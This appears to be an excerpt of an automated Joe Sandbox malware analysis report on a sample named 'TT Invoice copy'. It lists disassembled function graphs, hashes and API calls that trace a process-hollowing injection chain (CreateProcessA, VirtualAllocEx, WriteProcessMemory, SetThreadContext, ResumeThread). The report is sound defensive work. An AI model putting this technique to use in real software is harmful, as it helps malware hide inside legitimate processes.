                                                                                  Function 0566E990 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1138 566e990-566e997 1139 566e998-566ea2c DuplicateHandle 1138->1139 1140 566ea35-566ea52 1139->1140 1141 566ea2e-566ea34 1139->1141 1141->1140
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0566EA1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e91bcca0fd7e684a7e795c19780690740691579a15ad82b2bfb34842e8ab939a
                                                                                  • Instruction ID: 408e271c979e21d7d4f4e4269218efe4a1964f464b1405e691dd6d8262023031
                                                                                  • Opcode Fuzzy Hash: e91bcca0fd7e684a7e795c19780690740691579a15ad82b2bfb34842e8ab939a
                                                                                  • Instruction Fuzzy Hash: 942116B5900258AFDB10CF9AD484ADEBFF8FB48320F14801AE918A7310C775A954CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0566E998 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1150 566e998-566ea2c DuplicateHandle 1151 566ea35-566ea52 1150->1151 1152 566ea2e-566ea34 1150->1152 1152->1151
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0566EA1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: cb4df0a88c037f804353220ee5b62835c7fa598322cb81ef827dc80bf1a82d63
                                                                                  • Instruction ID: 5c53d643b5697d0b0dd2a383a0d22c702ff5c238f2f0ccecc95a428182b26db9
                                                                                  • Opcode Fuzzy Hash: cb4df0a88c037f804353220ee5b62835c7fa598322cb81ef827dc80bf1a82d63
                                                                                  • Instruction Fuzzy Hash: 1321E2B59002489FDB10CFAAD984ADEBBF8FB48320F14801AE918A3310D375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0566CC42 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1155 566cc42-566cc86 1157 566cc8e-566ccbc GlobalMemoryStatusEx 1155->1157 1158 566ccc5-566cced 1157->1158 1159 566ccbe-566ccc4 1157->1159 1159->1158
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0566CBC2), ref: 0566CCAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 43b401d9a443226c7a3a0a43441e34ab7d5ecc2e6db5f5cb91896cce5f5c0e28
                                                                                  • Instruction ID: 6cc81e06e9a5efca05f59a0a1f1320462f9003a75c5696bd74be8284c60141ef
                                                                                  • Opcode Fuzzy Hash: 43b401d9a443226c7a3a0a43441e34ab7d5ecc2e6db5f5cb91896cce5f5c0e28
                                                                                  • Instruction Fuzzy Hash: C31112B1C006599BDB10CFAAC544BDEFBF4EF48324F14816AE858A7241D778A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0566C2E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1162 566c2e4-566ccbc GlobalMemoryStatusEx 1165 566ccc5-566cced 1162->1165 1166 566ccbe-566ccc4 1162->1166 1166->1165
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0566CBC2), ref: 0566CCAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 21777d3a7eef594f0c9cba2f633f0e803f889b76ecce8fb5b83d54fc03549be7
                                                                                  • Instruction ID: afc0a919755cdc8228923f4036e516ed265ade8222e25019cf1568f2c1c656fa
                                                                                  • Opcode Fuzzy Hash: 21777d3a7eef594f0c9cba2f633f0e803f889b76ecce8fb5b83d54fc03549be7
                                                                                  • Instruction Fuzzy Hash: 711100B1C006599BDB10DF9AC544B9EFBF4EB48320F14816AE858B7251D378A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F4D005 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887228267.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_f4d000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4aa9455c60cd1848038d666bb28b6014065ebe4a4f3540c2035af10f539820a
                                                                                  • Instruction ID: c6d388ef794ca9add4df783fc331565b3419e10618d3d7ec7b619643f85b6d43
                                                                                  • Opcode Fuzzy Hash: b4aa9455c60cd1848038d666bb28b6014065ebe4a4f3540c2035af10f539820a
                                                                                  • Instruction Fuzzy Hash: 6C212B7150D3C09FD703CB24D994711BF71AB46224F29C5EBD8898F2A7C23A985ADB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F4D030 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887228267.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_f4d000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8ac40e3794da94eb821f7d0594104b7cb0f661ddb08441fe1dde547cf5661d07
                                                                                  • Instruction ID: 80d8dd36eb8abbfb9d24b7a13b6d5fb5f0737f920d0d6443f65277845ee59653
                                                                                  • Opcode Fuzzy Hash: 8ac40e3794da94eb821f7d0594104b7cb0f661ddb08441fe1dde547cf5661d07
                                                                                  • Instruction Fuzzy Hash: 7A210471604204DFDB14DF18D9C0B26BFA5FB84324F24C56DED0A4B29AC37AD847DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:184
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 22985 4504900 22986 4504ac0 22985->22986 22989 4504926 22985->22989 22987 4504a8b 22987->22987 22989->22987 22990 4502d70 22989->22990 22991 4504b80 PostMessageW 22990->22991 22992 4504bec 22991->22992 22992->22989 22993 231e860 22994 231e8a6 22993->22994 22997 231ea40 22994->22997 23000 231e5d8 22997->23000 23001 231eaa8 DuplicateHandle 23000->23001 23002 231e993 23001->23002 23032 231c7c0 23033 231c802 23032->23033 23034 231c808 GetModuleHandleW 23032->23034 23033->23034 23035 231c835 23034->23035 22794 4501695 22795 450158c 22794->22795 22796 450159b 22795->22796 22801 4503716 22795->22801 22818 45036a0 22795->22818 22834 45036b0 22795->22834 22850 4503630 22795->22850 22802 45036a4 22801->22802 22804 4503719 22801->22804 22803 45036d2 22802->22803 22867 4503aaf 22802->22867 22874 4503b0b 22802->22874 22879 4504026 22802->22879 22884 4503c45 22802->22884 22888 4504223 22802->22888 22893 4504101 22802->22893 22898 45041df 22802->22898 22903 4503fde 22802->22903 22911 450413a 22802->22911 22915 4503b3a 22802->22915 22923 4504039 22802->22923 22928 4503ff5 22802->22928 22933 450432f 22802->22933 22803->22795 22804->22795 22819 45036ca 22818->22819 22820 4503ff5 2 API calls 22819->22820 22821 4504039 2 API calls 22819->22821 22822 4503b3a 4 API calls 22819->22822 22823 450413a 2 API calls 22819->22823 22824 4503fde 4 API calls 22819->22824 22825 45041df 2 API calls 22819->22825 22826 4504101 2 API calls 22819->22826 22827 4504223 2 API calls 22819->22827 22828 4503c45 2 API calls 22819->22828 22829 4504026 2 API calls 22819->22829 22830 4503b0b 2 API calls 22819->22830 22831 4503aaf 4 API calls 22819->22831 22832 45036d2 22819->22832 22833 450432f 2 API calls 22819->22833 22820->22832 22821->22832 22822->22832 22823->22832 22824->22832 22825->22832 22826->22832 22827->22832 22828->22832 22829->22832 22830->22832 22831->22832 22832->22795 22833->22832 22835 45036ca 22834->22835 22836 45036d2 22835->22836 22837 4503ff5 2 API calls 22835->22837 22838 4504039 2 API calls 22835->22838 22839 4503b3a 4 API calls 22835->22839 22840 450413a 2 API calls 22835->22840 22841 4503fde 4 API calls 22835->22841 22842 45041df 2 API calls 22835->22842 22843 4504101 2 API calls 22835->22843 22844 4504223 2 API calls 22835->22844 22845 4503c45 2 API calls 22835->22845 22846 4504026 2 API calls 22835->22846 22847 4503b0b 2 API calls 22835->22847 22848 4503aaf 4 API calls 22835->22848 22849 450432f 2 API calls 22835->22849 22836->22795 22837->22836 22838->22836 22839->22836 22840->22836 22841->22836 22842->22836 22843->22836 22844->22836 22845->22836 22846->22836 22847->22836 22848->22836 22849->22836 22851 45036a8 22850->22851 22852 450364d 22850->22852 22853 4503ff5 2 API calls 22851->22853 22854 4504039 2 API calls 22851->22854 22855 4503b3a 4 API calls 22851->22855 22856 450413a 2 API calls 22851->22856 22857 4503fde 4 API calls 22851->22857 22858 45041df 2 API calls 22851->22858 22859 4504101 2 API calls 22851->22859 22860 4504223 2 API calls 22851->22860 22861 4503c45 2 API calls 22851->22861 22862 4504026 2 API calls 22851->22862 22863 4503b0b 2 API calls 22851->22863 22864 4503aaf 4 API calls 22851->22864 22865 45036d2 22851->22865 22866 450432f 2 API calls 22851->22866 22852->22795 22853->22865 22854->22865 22855->22865 22856->22865 22857->22865 22858->22865 22859->22865 22860->22865 22861->22865 22862->22865 22863->22865 22864->22865 22865->22795 22866->22865 22937 4501170 22867->22937 22941 4501164 22867->22941 22875 4503b14 22874->22875 22876 4503b26 22875->22876 22945 4500ee0 22875->22945 22949 4500ee8 22875->22949 22876->22803 22880 4503ffc 22879->22880 22953 4500ca0 22880->22953 22957 4500c98 22880->22957 22881 4504506 22886 4500ee0 WriteProcessMemory 22884->22886 22887 4500ee8 WriteProcessMemory 22884->22887 22885 4503b66 22885->22803 22886->22885 22887->22885 22889 4503b14 22888->22889 22890 4503b26 22889->22890 22891 4500ee0 WriteProcessMemory 22889->22891 22892 4500ee8 WriteProcessMemory 22889->22892 22890->22803 22891->22889 22892->22889 22894 450410e 22893->22894 22896 4500ca0 ResumeThread 22894->22896 22897 4500c98 ResumeThread 22894->22897 22895 4504506 22896->22895 22897->22895 22899 4503b14 22898->22899 22899->22898 22900 4503b26 22899->22900 22901 4500ee0 WriteProcessMemory 22899->22901 22902 4500ee8 WriteProcessMemory 22899->22902 22900->22803 22901->22899 22902->22899 22904 450407a 22903->22904 22905 4503ffc 22903->22905 22961 4500d50 22904->22961 22965 4500d48 22904->22965 22907 4500ca0 ResumeThread 22905->22907 22908 4500c98 ResumeThread 22905->22908 22906 4504506 22907->22906 22908->22906 22969 4500e20 22911->22969 22973 4500e28 22911->22973 22912 450415b 22912->22803 22916 45040b4 22915->22916 22921 4500d50 Wow64SetThreadContext 22916->22921 22922 4500d48 Wow64SetThreadContext 22916->22922 22917 4503b14 22918 4503b26 22917->22918 22919 4500ee0 WriteProcessMemory 22917->22919 22920 4500ee8 WriteProcessMemory 22917->22920 22918->22803 22919->22917 22920->22917 22921->22917 22922->22917 22977 4500fd0 22923->22977 22981 4500fd8 22923->22981 22924 450401a 22924->22923 22925 4503c0f 22924->22925 22925->22803 22929 4503ffb 22928->22929 22931 4500ca0 ResumeThread 22929->22931 22932 4500c98 ResumeThread 22929->22932 22930 4504506 22931->22930 22932->22930 22935 4500ee0 WriteProcessMemory 22933->22935 22936 4500ee8 WriteProcessMemory 22933->22936 22934 450435d 22935->22934 22936->22934 22938 45011f9 CreateProcessA 22937->22938 22940 45013bb 22938->22940 22942 45011f9 CreateProcessA 22941->22942 22944 45013bb 22942->22944 22946 4500f30 WriteProcessMemory 22945->22946 22948 4500f87 22946->22948 22948->22875 22950 4500f30 WriteProcessMemory 22949->22950 22952 4500f87 22950->22952 22952->22875 22954 4500ce0 ResumeThread 22953->22954 22956 4500d11 22954->22956 22956->22881 22958 4500ca0 ResumeThread 22957->22958 22960 4500d11 22958->22960 22960->22881 22962 4500d95 Wow64SetThreadContext 22961->22962 22964 4500ddd 22962->22964 22964->22905 22966 4500d50 Wow64SetThreadContext 22965->22966 22968 4500ddd 22966->22968 22968->22905 22970 4500e68 VirtualAllocEx 22969->22970 22972 4500ea5 22970->22972 22972->22912 22974 4500e68 VirtualAllocEx 22973->22974 22976 4500ea5 22974->22976 22976->22912 22978 4500fd8 ReadProcessMemory 22977->22978 22980 4501067 22978->22980 22980->22924 22982 4501023 ReadProcessMemory 22981->22982 22984 4501067 22982->22984 22984->22924 23003 231c868 23004 231c87c 23003->23004 23005 231c8a1 23004->23005 23007 231c280 23004->23007 23008 231ca48 LoadLibraryExW 23007->23008 23010 231cac1 23008->23010 23010->23005 23011 23147e8 23013 2314804 23011->23013 23012 231487e 23013->23012 23015 23149b0 23013->23015 23016 23149d5 23015->23016 23020 2314ac0 23016->23020 23024 2314aaf 23016->23024 23022 2314ae7 23020->23022 23021 2314bc4 23021->23021 23022->23021 23028 2314660 23022->23028 23025 2314ae7 23024->23025 23026 2314bc4 23025->23026 23027 2314660 CreateActCtxA 23025->23027 23027->23026 23029 2315b50 CreateActCtxA 23028->23029 23031 2315c13 23029->23031 23031->23031

                                                                                  Executed Functions

                                                                                  Function 068704FF Relevance: 16.5, Strings: 13, Instructions: 237COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 294 68704ff 295 6870504-6870507 294->295 296 6870519-687051d 295->296 297 6870509 295->297 309 6870540 296->309 310 687051f-6870528 296->310 297->296 298 6870837-6870840 297->298 299 68707a5-68707a9 297->299 300 6870642-687066b 297->300 301 6870721-6870726 297->301 302 6870820-6870834 297->302 303 68706ee-68706f6 297->303 304 687066e-6870673 297->304 305 68706fb-687070e 297->305 306 687072b-687073e 297->306 307 68705bb-68705bf 297->307 308 6870678-687068b 297->308 313 68707cc 299->313 314 68707ab-68707b4 299->314 300->304 301->295 303->295 304->295 341 6870710 305->341 342 687071a-687071f 305->342 332 6870761 306->332 333 6870740-6870749 306->333 311 68705e2 307->311 312 68705c1-68705ca 307->312 334 6870843 308->334 335 6870691-68706a6 308->335 317 6870543-6870545 309->317 315 687052f-687053c 310->315 316 687052a-687052d 310->316 319 68705e5-68705e9 311->319 327 68705d1-68705de 312->327 328 68705cc-68705cf 312->328 325 68707cf-68707ea 313->325 320 68707b6-68707b9 314->320 321 68707bb-68707c8 314->321 324 687053e 315->324 316->324 329 6870547-687054d 317->329 330 687055d-68705a6 317->330 337 68705ff 319->337 338 68705eb-68705fd 319->338 339 68707ca 320->339 321->339 324->317 370 68707ec-68707f6 325->370 371 6870808-6870812 325->371 336 68705e0 327->336 328->336 343 6870551-687055b 329->343 344 687054f 329->344 389 68705a8 call 6871596 330->389 390 68705a8 call 6871734 330->390 391 68705a8 call 6871608 330->391 392 68705a8 call 6871618 330->392 349 6870764-6870770 332->349 346 6870750-687075d 333->346 347 687074b-687074e 333->347 334->334 360 68706c4 335->360 361 68706a8-68706ae 335->361 336->319 351 6870602-6870630 337->351 338->351 339->325 354 6870715 341->354 342->354 343->330 344->330 356 687075f 346->356 347->356 367 6870772-6870778 349->367 368 6870788-6870792 349->368 351->334 386 6870636-687063d 351->386 354->295 356->349 369 68706c6-68706c8 360->369 365 68706b4-68706c0 361->365 366 68706b0-68706b2 361->366 374 68706c2 365->374 366->374 375 687077c-687077e 367->375 376 687077a 367->376 368->334 377 6870798-68707a0 368->377 378 68706d6-68706e9 369->378 379 68706ca-68706d0 369->379 370->334 381 68707f8-68707fe 370->381 371->334 372 6870814-687081e 371->372 382 6870803 372->382 374->369 375->368 376->368 377->295 378->295 384 68706d4 379->384 385 68706d2 379->385 381->382 382->295 384->378 385->378 386->295 387 68705ae-68705b6 387->295 389->387 390->387 391->387 392->387
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                  • API String ID: 0-1437089595
                                                                                  • Opcode ID: 0ecea089f152ba367346884f49965385f2be5a4e074da5d292c68747ed566361
                                                                                  • Instruction ID: 8d8f4764879ca6eb58e8d632de5add7b26a84fdff552a744bf564b1c0d58a49b
                                                                                  • Opcode Fuzzy Hash: 0ecea089f152ba367346884f49965385f2be5a4e074da5d292c68747ed566361
                                                                                  • Instruction Fuzzy Hash: 03918CB4E0421CCFDB58CA98D955A6EB7B2BB80744F248516E502EF399CB71DC86CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04501164 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 497 4501164-4501205 499 4501207-4501211 497->499 500 450123e-450125e 497->500 499->500 501 4501213-4501215 499->501 507 4501260-450126a 500->507 508 4501297-45012c6 500->508 503 4501217-4501221 501->503 504 4501238-450123b 501->504 505 4501223 503->505 506 4501225-4501234 503->506 504->500 505->506 506->506 509 4501236 506->509 507->508 510 450126c-450126e 507->510 514 45012c8-45012d2 508->514 515 45012ff-45013b9 CreateProcessA 508->515 509->504 512 4501270-450127a 510->512 513 4501291-4501294 510->513 516 450127c 512->516 517 450127e-450128d 512->517 513->508 514->515 518 45012d4-45012d6 514->518 528 45013c2-4501448 515->528 529 45013bb-45013c1 515->529 516->517 517->517 519 450128f 517->519 520 45012d8-45012e2 518->520 521 45012f9-45012fc 518->521 519->513 523 45012e4 520->523 524 45012e6-45012f5 520->524 521->515 523->524 524->524 525 45012f7 524->525 525->521 539 4501458-450145c 528->539 540 450144a-450144e 528->540 529->528 542 450146c-4501470 539->542 543 450145e-4501462 539->543 540->539 541 4501450 540->541 541->539 545 4501480-4501484 542->545 546 4501472-4501476 542->546 543->542 544 4501464 543->544 544->542 548 4501496-450149d 545->548 549 4501486-450148c 545->549 546->545 547 4501478 546->547 547->545 550 45014b4 548->550 551 450149f-45014ae 548->551 549->548 553 45014b5 550->553 551->550 553->553
                                                                                  APIs
                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 045013A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 6adf9cda5cd61773ec97c286c6a4f09b599d225f42d33efcd8da864340d6ee0b
                                                                                  • Instruction ID: 2b37d2178d2f09f57f79d83596a12d00cf46388ccec82c4dc5db85dd6c3139d8
                                                                                  • Opcode Fuzzy Hash: 6adf9cda5cd61773ec97c286c6a4f09b599d225f42d33efcd8da864340d6ee0b
                                                                                  • Instruction Fuzzy Hash: C5A1A071D0061ADFDB20CFA9D8417EDBBB2BF44314F0481A9E848E7290DB75A985DF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04501170 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 554 4501170-4501205 556 4501207-4501211 554->556 557 450123e-450125e 554->557 556->557 558 4501213-4501215 556->558 564 4501260-450126a 557->564 565 4501297-45012c6 557->565 560 4501217-4501221 558->560 561 4501238-450123b 558->561 562 4501223 560->562 563 4501225-4501234 560->563 561->557 562->563 563->563 566 4501236 563->566 564->565 567 450126c-450126e 564->567 571 45012c8-45012d2 565->571 572 45012ff-45013b9 CreateProcessA 565->572 566->561 569 4501270-450127a 567->569 570 4501291-4501294 567->570 573 450127c 569->573 574 450127e-450128d 569->574 570->565 571->572 575 45012d4-45012d6 571->575 585 45013c2-4501448 572->585 586 45013bb-45013c1 572->586 573->574 574->574 576 450128f 574->576 577 45012d8-45012e2 575->577 578 45012f9-45012fc 575->578 576->570 580 45012e4 577->580 581 45012e6-45012f5 577->581 578->572 580->581 581->581 582 45012f7 581->582 582->578 596 4501458-450145c 585->596 597 450144a-450144e 585->597 586->585 599 450146c-4501470 596->599 600 450145e-4501462 596->600 597->596 598 4501450 597->598 598->596 602 4501480-4501484 599->602 603 4501472-4501476 599->603 600->599 601 4501464 600->601 601->599 605 4501496-450149d 602->605 606 4501486-450148c 602->606 603->602 604 4501478 603->604 604->602 607 45014b4 605->607 608 450149f-45014ae 605->608 606->605 610 45014b5 607->610 608->607 610->610
                                                                                  APIs
                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 045013A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: bc0c527aecf35f35d26bc089dbf79587ccc11f824ca9f874303b3878a1ff24f9
                                                                                  • Instruction ID: 2675679993607f9b0591592fed31315e758711ddb59798c498f2854ff0ce6aa5
                                                                                  • Opcode Fuzzy Hash: bc0c527aecf35f35d26bc089dbf79587ccc11f824ca9f874303b3878a1ff24f9
                                                                                  • Instruction Fuzzy Hash: C3919E71D0061ADFDB20CFA9D8417EDBBB2BF44314F0481A9E848E7290DB75A985DF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02314660 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 611 2314660-2315c11 CreateActCtxA 614 2315c13-2315c19 611->614 615 2315c1a-2315c74 611->615 614->615 622 2315c83-2315c87 615->622 623 2315c76-2315c79 615->623 624 2315c89-2315c95 622->624 625 2315c98 622->625 623->622 624->625 627 2315c99 625->627 627->627
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02315C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 073b72ec002ee950a03356538872c475b2c59886fad6971c4ffaa04bb629786f
                                                                                  • Instruction ID: 35da8440e8ab5521bd4997bb7d920ee1b5413baef792c0189f6efcb320457a87
                                                                                  • Opcode Fuzzy Hash: 073b72ec002ee950a03356538872c475b2c59886fad6971c4ffaa04bb629786f
                                                                                  • Instruction Fuzzy Hash: D941DFB0C00619CFDB28DFA9C944B9EBBF5BF88304F64806AD408AB255DBB56945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02315B45 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 628 2315b45-2315c11 CreateActCtxA 630 2315c13-2315c19 628->630 631 2315c1a-2315c74 628->631 630->631 638 2315c83-2315c87 631->638 639 2315c76-2315c79 631->639 640 2315c89-2315c95 638->640 641 2315c98 638->641 639->638 640->641 643 2315c99 641->643 643->643
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02315C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 11e0ed44bf5ed038bf467937a289a28b59967ee1fa68051867c171a68ec1254e
                                                                                  • Instruction ID: ff7d1f04799b1fb39f384a40a4f183a689edb2cc934a218b2a91624e45b8ca93
                                                                                  • Opcode Fuzzy Hash: 11e0ed44bf5ed038bf467937a289a28b59967ee1fa68051867c171a68ec1254e
                                                                                  • Instruction Fuzzy Hash: 0F41C3B4C00619CFDB24DFA9C984BDEBBF5BF89304F24806AD408AB255DB756946CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500EE0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 644 4500ee0-4500f36 646 4500f46-4500f85 WriteProcessMemory 644->646 647 4500f38-4500f44 644->647 649 4500f87-4500f8d 646->649 650 4500f8e-4500fbe 646->650 647->646 649->650
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04500F78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: e27a74ae378b712b280d280643198956f39f1e161d4ec4a2005c2d3531681bfe
                                                                                  • Instruction ID: 8a37782e44e2785cdb4b2691dbcebf6ab3a903ea7a0c3eb2715568a02298e39c
                                                                                  • Opcode Fuzzy Hash: e27a74ae378b712b280d280643198956f39f1e161d4ec4a2005c2d3531681bfe
                                                                                  • Instruction Fuzzy Hash: B6216BB590030D9FCB10CFA9D985BDEBBF5FF48310F108429E958A7250C778A544DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500EE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 654 4500ee8-4500f36 656 4500f46-4500f85 WriteProcessMemory 654->656 657 4500f38-4500f44 654->657 659 4500f87-4500f8d 656->659 660 4500f8e-4500fbe 656->660 657->656 659->660
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04500F78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
